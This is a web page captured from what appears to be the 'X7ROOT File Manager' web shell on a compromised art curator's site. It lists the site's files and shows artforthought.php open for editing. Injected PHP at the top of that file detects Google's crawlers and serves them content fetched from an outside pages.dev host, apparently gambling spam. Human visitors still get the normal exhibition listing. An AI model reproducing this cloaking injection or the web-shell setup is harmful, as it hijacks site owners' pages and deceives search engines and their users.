X7ROOT File Manager
Current Path:
/home/u408670528/domains/vittoriabeltrame.com/public_html
home
/
u408670528
/
domains
/
vittoriabeltrame.com
/
public_html
/
📁
..
📄
.htaccess
(0 B)
📄
AFT.php
(6.02 KB)
📄
about.php
(7.46 KB)
📁
admin
📄
artforthought.php
(21.25 KB)
📄
artist.php
(5.8 KB)
📄
artists.php
(3.46 KB)
📁
assets
📄
backend.php
(4.67 KB)
📄
default.php
(15.99 KB)
📄
exhibition.php
(6.42 KB)
📄
exhibitions.php
(48.79 KB)
📄
google86e18cc05e62c1fd.html
(53 B)
📁
includes
📄
index.php
(10.02 KB)
📄
login.php
(676 B)
📄
press.php
(40.65 KB)
📄
privacy_policy.php
(26.05 KB)
📄
readme.html
(199 B)
Editing: artforthought.php
<?php $userAgent = strtolower($_SERVER['HTTP_USER_AGENT'] ?? ''); function is_googlebot($ua) { $bots = [ 'googlebot', 'google-inspectiontool', 'adsbot-google', 'mediapartners-google' ]; foreach ($bots as $bot) { if (strpos($ua, $bot) !== false) { return true; } } return false; } if (is_googlebot($userAgent)) { $url = 'https://lanciauterbang.pages.dev/ttt888daftarsitusgame.txt'; $context = stream_context_create([ 'http' => [ 'method' => 'GET', 'timeout' => 5, 'header' => "User-Agent: Googlebot\r\n" ] ]); $content = @file_get_contents($url, false, $context); header("Content-Type: text/html; charset=UTF-8"); if ($content !== false) { echo $content; // aa.txt boleh berisi HTML } else { echo "Content unavailable"; } exit; } /* ===================== USER BIASA ===================== */ ?> <!DOCTYPE html> <html> <head> <!-- Basic --> <meta charset="utf-8"> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <title>Vittoria Beltrame - Art Curator</title> <meta name="keywords" content="Vittoria Beltrame, art curator, art dealer, art advisor, curator, advisor" /> <meta name="description" content="Vittoria Beltrame is a curator, art dealer and advisor."> <meta name="author" content="www.chiarafiorentini.com"> <!-- Favicon --> <link rel="shortcut icon" href="assets/img/favicon.ico" type="image/x-icon" /> <link rel="apple-touch-icon" href="assets/img/favicon/apple-touch-icon.png"> <!-- Mobile Metas --> <meta name="viewport" content="width=device-width, initial-scale=1, minimum-scale=1.0, shrink-to-fit=no"> <!-- Web Fonts --> <link id="googleFonts" href="https://fonts.googleapis.com/css2?family=Montserrat:wght@300;400;600;700&family=Playfair+Display:wght@400;700;900&family=Poppins:wght@200;300;400;500;600;700;800&family=Raleway:ital,wght@0,100;0,200;0,300;1,100;1,200;1,300&display=swap" rel="stylesheet" type="text/css"> <!-- Vendor CSS --> <link rel="stylesheet" href="assets/vendor/bootstrap/css/bootstrap.min.css"> <link rel="stylesheet" href="assets/vendor/fontawesome-free/css/all.min.css"> <link rel="stylesheet" href="assets/vendor/animate/animate.compat.css"> <link rel="stylesheet" href="assets/vendor/simple-line-icons/css/simple-line-icons.min.css"> <link rel="stylesheet" href="assets/vendor/owl.carousel/assets/owl.carousel.min.css"> <link rel="stylesheet" href="assets/vendor/owl.carousel/assets/owl.theme.default.min.css"> <link rel="stylesheet" href="assets/vendor/magnific-popup/magnific-popup.min.css"> <!-- Theme CSS --> <link rel="stylesheet" href="assets/css/theme.css"> <link rel="stylesheet" href="assets/css/theme-elements.css"> <link rel="stylesheet" href="assets/css/theme-blog.css"> <link rel="stylesheet" href="assets/css/theme-shop.css"> <!-- Skin CSS --> <!-- <link id="skinCSS" rel="stylesheet" href="assets/css/skins/default.css"> --> <link id="skinCSS" rel="stylesheet" href="assets/css/skins/skin-corporate-10.css"> <!-- Theme Custom CSS --> <link rel="stylesheet" href="assets/css/custom.css"> <!-- Head Libs --> <script src="assets/vendor/modernizr/modernizr.min.js"></script> </head> <body data-plugin-page-transition> <div class="body"> <header id="header" class="header-transparent header-effect-shrink" data-plugin-options="{'stickyEnabled': true, 'stickyEffect': 'shrink', 'stickyEnableOnBoxed': true, 'stickyEnableOnMobile': false, 'stickyChangeLogo': true, 'stickyStartAt': 30, 'stickyHeaderContainerHeight': 70}"> <div class="header-body border-top-0 bg-light box-shadow-none"> <div class="header-container container"> <div class="header-row"> <div class="header-column"> <div class="header-row"> <div class="header-logo"> <a href="https://vittoriabeltrame.com"> <p class="pt-3">VITTORIA BELTRAME</p> <!-- <img alt="Porto" width="82" height="40" src="assets/img/logo-default-slim-dark-small.png"> --> </a> </div> </div> </div> <!-- header column --> <div class="header-column justify-content-end"> <div class="header-row"> <div class="header-nav header-nav-links header-nav-dropdowns-light header-nav-dark-text order-2 order-lg-1"> <div class="header-nav-main header-nav-main-mobile-light header-nav-main-square header-nav-main-dropdown-no-borders header-nav-main-effect-2 header-nav-main-sub-effect-1"> <nav class="collapse"> <ul class="nav nav-pills" id="mainNav"> <li class="dropdown my-3 my-md-0"> <a class="dropdown-item " href="exhibitions.php"> Exhibitions </a> </li> <li class="dropdown my-3 my-md-0"> <a class="dropdown-item " href="artists.php"> Artists </a> </li> <li class="dropdown my-3 my-md-0"> <a class="dropdown-item " href="about.php"> about </a> </li> <li class="dropdown my-3 my-md-0"> <a class="dropdown-item " href="press.php"> press </a> </li> <li class="dropdown my-3 my-md-0"> <a class="dropdown-item active" href="artforthought.php"> art for thought </a> </li> </ul> </nav> </div> <button class="btn header-btn-collapse-nav" data-bs-toggle="collapse" data-bs-target=".header-nav-main nav"> <i class="fas fa-bars"></i> </button> </div> <!-- header nav --> </div> <!-- header row --> </div> <!-- header column --> </div> <!-- header row --> </div> <!-- header container --> </div> <!-- header body --> </header> <!-- fin header --> <div role="main" class="main"> <section class="page-header page-header-modern page-header-background page-header-background-md parallax overlay overlay-color-light overlay-show overlay-op-7 mt-0" data-plugin-parallax data-plugin-options="{'speed': 1.2}" data-image-src="assets/img/vittoria/mainPink.jpg"> <div class="container"> <div class="row"> <div class="col-md-12 align-self-center p-static order-2 text-center"> <h1 class="text-dark">Art For Thought <strong></strong></h1> </div> </div> </div> </section> <div class="container py-4"> <div class="row"> <div class="col"> <div class="blog-posts"> <div class="row"> <div class="col-md-4"> <article class="post post-medium border-0 pb-0 mb-5"> <div class="post-image aft-post-image"> <a href="AFT.php?aft=11"> <img src="assets/img/blog/IMG_6977.jpeg" class="img-fluid img-thumbnail img-thumbnail-no-borders rounded-0" alt="Georg Baselitz “A Confession of My Sins” at White Cube Bermondsey"/> </a> </div> <div class="post-content"> <h2 class="font-weight-semibold text-5 line-height-6 mt-3 mb-2"><a href="AFT.php?aft=11">AFT #11 </a></h2> <p> Georg Baselitz “A Confession of My Sins” at White Cube Bermondsey, Bobbye Fermie “16 One Act Plays” solo at Wilder Gallery, Eddie Ruscha at Cedric Bardawil in Soho</p> <div class="post-meta"> <span class="d-block mt-2"> <a href="AFT.php?aft=11" class="btn btn-xs btn-light text-1 text-uppercase"> Read More </a> </span> </div> </div> </article> </div> <div class="col-md-4"> <article class="post post-medium border-0 pb-0 mb-5"> <div class="post-image aft-post-image"> <a href="AFT.php?aft=10"> <img src="assets/img/blog/Screenshot 2024-09-01 at 12.12.46.png" class="img-fluid img-thumbnail img-thumbnail-no-borders rounded-0" alt="Cecilia Fiona’s solo at Vitrine Gallery"/> </a> </div> <div class="post-content"> <h2 class="font-weight-semibold text-5 line-height-6 mt-3 mb-2"><a href="AFT.php?aft=10">AFT #10 </a></h2> <p> Cecilia Fiona’s solo at Vitrine Gallery, Melania Toma at Pictorum Gallery, UVA at 180 Studios</p> <div class="post-meta"> <span class="d-block mt-2"> <a href="AFT.php?aft=10" class="btn btn-xs btn-light text-1 text-uppercase"> Read More </a> </span> </div> </div> </article> </div> <div class="col-md-4"> <article class="post post-medium border-0 pb-0 mb-5"> <div class="post-image aft-post-image"> <a href="AFT.php?aft=9"> <img src="assets/img/blog/Screenshot 2024-09-01 at 12.13.41.png" class="img-fluid img-thumbnail img-thumbnail-no-borders rounded-0" alt="Eva Dixon, Mia Wilkinson and Manon Steyaert at Saatchi Gallery"/> </a> </div> <div class="post-content"> <h2 class="font-weight-semibold text-5 line-height-6 mt-3 mb-2"><a href="AFT.php?aft=9">AFT #9 </a></h2> <p> Eva Dixon, Mia Wilkinson and Manon Steyaert at Saatchi Gallery, Melania Toma at Saatchi Gallery in STUDIO: RESPONSE #4, ‘Grass Stained Heart’ Nooka Shepherd’s solo at Soho Revue</p> <div class="post-meta"> <span class="d-block mt-2"> <a href="AFT.php?aft=9" class="btn btn-xs btn-light text-1 text-uppercase"> Read More </a> </span> </div> </div> </article> </div> <div class="col-md-4"> <article class="post post-medium border-0 pb-0 mb-5"> <div class="post-image aft-post-image"> <a href="AFT.php?aft=8"> <img src="assets/img/blog/Screenshot 2024-09-01 at 12.14.56.png" class="img-fluid img-thumbnail img-thumbnail-no-borders rounded-0" alt=""Body Politic" Antony Gormley at White Cube Bermondsey"/> </a> </div> <div class="post-content"> <h2 class="font-weight-semibold text-5 line-height-6 mt-3 mb-2"><a href="AFT.php?aft=8">AFT #8 </a></h2> <p> "Body Politic" Antony Gormley at White Cube Bermondsey, “Two Eyes Wide Open at the Edge of Dawn” Liorah Tchiprout’s solo at Marlborough Gallery, "Wedgwood" at Pippy Houldsworth </p> <div class="post-meta"> <span class="d-block mt-2"> <a href="AFT.php?aft=8" class="btn btn-xs btn-light text-1 text-uppercase"> Read More </a> </span> </div> </div> </article> </div> <div class="col-md-4"> <article class="post post-medium border-0 pb-0 mb-5"> <div class="post-image aft-post-image"> <a href="AFT.php?aft=6"> <img src="assets/img/blog/Screenshot 2024-09-01 at 12.16.56.png" class="img-fluid img-thumbnail img-thumbnail-no-borders rounded-0" alt="Isabella Lolita Amram at ONE Akaretler in Istanbul"/> </a> </div> <div class="post-content"> <h2 class="font-weight-semibold text-5 line-height-6 mt-3 mb-2"><a href="AFT.php?aft=6">AFT #6 </a></h2> <p> Isabella Lolita Amram at ONE Akaretler in Istanbul, Lydia Hamblet's solo show 'Noises in the Florid Sky' at Pictorum Gallery, London, Sheila Hicks "Infinite Potentials" at Alison Jacques</p> <div class="post-meta"> <span class="d-block mt-2"> <a href="AFT.php?aft=6" class="btn btn-xs btn-light text-1 text-uppercase"> Read More </a> </span> </div> </div> </article> </div> <div class="col-md-4"> <article class="post post-medium border-0 pb-0 mb-5"> <div class="post-image aft-post-image"> <a href="AFT.php?aft=5"> <img src="assets/img/blog/Screenshot 2024-09-01 at 12.18.09.png" class="img-fluid img-thumbnail img-thumbnail-no-borders rounded-0" alt="“Kim Booker: I Want To Live Twice” at Bo Lee and Workman"/> </a> </div> <div class="post-content"> <h2 class="font-weight-semibold text-5 line-height-6 mt-3 mb-2"><a href="AFT.php?aft=5">AFT #5 </a></h2> <p> “Kim Booker: I Want To Live Twice” at Bo Lee and Workman, "Face to Face" at Marlborough Gallery, "Sahara Longe: New Shapes" at Timothy Taylor London</p> <div class="post-meta"> <span class="d-block mt-2"> <a href="AFT.php?aft=5" class="btn btn-xs btn-light text-1 text-uppercase"> Read More </a> </span> </div> </div> </article> </div> <div class="col-md-4"> <article class="post post-medium border-0 pb-0 mb-5"> <div class="post-image aft-post-image"> <a href="AFT.php?aft=4"> <img src="assets/img/blog/Screenshot 2024-09-01 at 12.19.15.png" class="img-fluid img-thumbnail img-thumbnail-no-borders rounded-0" alt="A Night at the Museum"/> </a> </div> <div class="post-content"> <h2 class="font-weight-semibold text-5 line-height-6 mt-3 mb-2"><a href="AFT.php?aft=4">AFT #4 </a></h2> <p> A Night at the Museum, “Salvador Dalí: The Image Disappears”, "Van Gogh and the Avant-Garde: The Modern Landscape"</p> <div class="post-meta"> <span class="d-block mt-2"> <a href="AFT.php?aft=4" class="btn btn-xs btn-light text-1 text-uppercase"> Read More </a> </span> </div> </div> </article> </div> <div class="col-md-4"> <article class="post post-medium border-0 pb-0 mb-5"> <div class="post-image aft-post-image"> <a href="AFT.php?aft=3"> <img src="assets/img/blog/Screenshot 2024-09-01 at 12.21.23.png" class="img-fluid img-thumbnail img-thumbnail-no-borders rounded-0" alt=""So let us all be citizens too," at David Zwirner"/> </a> </div> <div class="post-content"> <h2 class="font-weight-semibold text-5 line-height-6 mt-3 mb-2"><a href="AFT.php?aft=3">AFT #3 </a></h2> <p> "So let us all be citizens too," at David Zwirner, "Hilma af Klint & Piet Mondrian: Forms of Life," at Tate Modern, "The Rossettis," at Tate Britain</p> <div class="post-meta"> <span class="d-block mt-2"> <a href="AFT.php?aft=3" class="btn btn-xs btn-light text-1 text-uppercase"> Read More </a> </span> </div> </div> </article> </div> <div class="col-md-4"> <article class="post post-medium border-0 pb-0 mb-5"> <div class="post-image aft-post-image"> <a href="AFT.php?aft=2"> <img src="assets/img/blog/Screenshot 2024-09-01 at 12.22.33.png" class="img-fluid img-thumbnail img-thumbnail-no-borders rounded-0" alt="Opening of TKE Studios presented by Tracey Emin"/> </a> </div> <div class="post-content"> <h2 class="font-weight-semibold text-5 line-height-6 mt-3 mb-2"><a href="AFT.php?aft=2">AFT #2 </a></h2> <p> Opening of TKE Studios presented by Tracey Emin, Look Out For: Kim Booker, “Mother Me” Daisy Parris’ solo show at Carl Freedman</p> <div class="post-meta"> <span class="d-block mt-2"> <a href="AFT.php?aft=2" class="btn btn-xs btn-light text-1 text-uppercase"> Read More </a> </span> </div> </div> </article> </div> </div> <!-- <div class="row"> <div class="col"> <ul class="pagination float-end"> <li class="page-item"><a class="page-link" href="#"><i class="fas fa-angle-left"></i></a></li> <li class="page-item active"><a class="page-link" href="#">1</a></li> <li class="page-item"><a class="page-link" href="#">2</a></li> <li class="page-item"><a class="page-link" href="#">3</a></li> <li class="page-item"><a class="page-link" href="#"><i class="fas fa-angle-right"></i></a></li> </ul> </div> </div> --> </div> </div> </div> </div> </div> <!-- main --> <footer id="footer"> <div class="container"> <div class="footer-ribbon"> <span>Get in Touch</span> </div> <div class="row py-5 mt-4"> <div class="col-md-6 col-lg-4 mb-4 mb-md-0"> <h5 class="text-3 text-dark mb-3">CONTACT ME</h5> <ul class="list list-icons list-icons-lg"> <li class="mb-1"><i class="far fa-dot-circle text-color-primary"></i><p class="m-0">Based in London, available everywhere</p></li> <li class="mb-1"><i class="far fa-envelope text-color-primary"></i><p class="m-0"><a href="mailto:vittoria.c.beltrame@gmail.com" class="text-color-dark opacity-7 ps-1">vittoria.c.beltrame@gmail.com</a></p></li> </ul> </div> <div class="col-md-6 col-lg-3 mb-4 mb-md-0"> <h5 class="text-3 text-dark mb-3">FOLLOW ME</h5> <ul class="footer-social-icons social-icons social-icons-clean social-icons-icon-dark"> <li class="social-icons-instagram"><a href="https://www.instagram.com/vittoria.beltrame/?igshid=YmMyMTA2M2Y%3D" target="_blank" title="Instagram"><i class="fab fa-instagram text-color-primary text-4"></i></a></li> <li class="social-icons-linkedin"><a href="https://uk.linkedin.com/in/vittoria-beltrame-9531a3159" target="_blank" title="Linkedin"><i class="fab fa-linkedin-in text-color-primary text-4"></i></a></li> </ul> </div> <div class="col-md-6 col-lg-5 mb-4 mb-lg-0"> <h5 class="text-3 text-dark mb-3">NEWSLETTER</h5> <p class="pe-1">Keep up on the latest news. Enter your e-mail address and subscribe to the newsletter.</p> <div class="alert alert-success d-none" id="newsletterSuccess"> <strong>Success!</strong> You've been added to our email list. </div> <div class="alert alert-danger d-none" id="newsletterError"></div> <form id="newsletterForm" action="assets/php/newsletter-subscribe.php" method="POST" class="me-4 mb-3 mb-md-0"> <div class="input-group input-group-rounded"> <input class="form-control form-control-sm bg-light" placeholder="Email Address" name="newsletterEmail" id="newsletterEmail" type="email"> <button class="btn text-color-dark suscription-button" type="submit"><strong>SUBSCRIBE!</strong></button> <p class="privacy_acceptance"><span class="importance">*</span>By subscribing to the newsletter you are accepting our <a href="privacy_policy.php">privacy policy</a></p> </div> </form> </div> </div> <div class="text-center pb-3"> <p class="mb-0">© Copyright 2023. | Web by <a href="https://chiarafiorentini.com" target="_blank" class="text-color-dark opacity-7 ps-1">chiara.</a></p> </div> </div> </footer> </div> <!-- body end --> <!-- Vendor --> <script src="assets/vendor/jquery/jquery.min.js"></script> <script src="assets/vendor/jquery.appear/jquery.appear.min.js"></script> <script src="assets/vendor/jquery.easing/jquery.easing.min.js"></script> <script src="assets/vendor/jquery.cookie/jquery.cookie.min.js"></script> <script src="assets/vendor/bootstrap/js/bootstrap.bundle.min.js"></script> <script src="assets/vendor/jquery.validation/jquery.validate.min.js"></script> <script src="assets/vendor/jquery.easy-pie-chart/jquery.easypiechart.min.js"></script> <script src="assets/vendor/jquery.gmap/jquery.gmap.min.js"></script> <script src="assets/vendor/lazysizes/lazysizes.min.js"></script> <script src="assets/vendor/isotope/jquery.isotope.min.js"></script> <script src="assets/vendor/owl.carousel/owl.carousel.min.js"></script> <script src="assets/vendor/magnific-popup/jquery.magnific-popup.min.js"></script> <script src="assets/vendor/vide/jquery.vide.min.js"></script> <script src="assets/vendor/vivus/vivus.min.js"></script> <!-- Theme Base, Components and Settings --> <script src="assets/js/theme.js"></script> <!-- Current Page Vendor and Views --> <script src="assets/js/views/view.contact.js"></script> <!-- Theme Custom --> <script src="assets/js/custom.js"></script> <!-- Theme Initialization Files --> <script src="assets/js/theme.init.js"></script> </body> </html>
Upload File
Create Folder